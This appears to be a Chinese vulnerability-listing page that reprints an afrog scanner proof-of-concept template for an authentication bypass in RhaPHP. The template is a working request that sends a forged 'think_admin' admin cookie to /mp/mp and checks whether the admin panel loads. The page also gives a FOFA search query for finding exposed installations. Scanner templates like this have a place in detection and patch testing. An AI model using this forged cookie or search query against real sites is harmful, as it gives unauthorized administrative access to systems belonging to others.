rhaphp-universal-cookie: RHaphp universal cookie

日期: 2025-09-01 | 影响软件: RHaphp universal cookie | POC: 已公开

漏洞描述

FOFA: app="RhaPHP系统安装"

PoC代码[已公开]

id: rhaphp-universal-cookie

info:
  name: RHaphp universal cookie
  author: lsqm
  severity: high
  verified: true
  description: |
    FOFA: app="RhaPHP系统安装"
  created: 2023/06/25

rules:
  r0:
    request:
      method: GET
      path: /mp/mp
      headers:
        Cookie: think_admin=think%3A%7B%22id%22%3A%221%22%2C%22admin_name%22%3A%22admin%22%2C%22password%22%3A%22c77c2771505679b013eac4a6dbb3c6c7%22%2C%22status%22%3A%221%22%2C%22ip%22%3A%22127.0.0.1%22%2C%22last_time%22%3A%221664263362%22%2C%22rand_str%22%3A%22spDjRC%22%2C%22admin_id%22%3A%221%22%7D;PHPSESSID=598c2a7c00f8b59fe4d35d802166e2ed
    expression: response.status == 200 && response.body.bcontains(b"自动回复") && response.body.ibcontains(b"RhaPHP")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/rhaphp-universal-cookie.yaml

相关漏洞推荐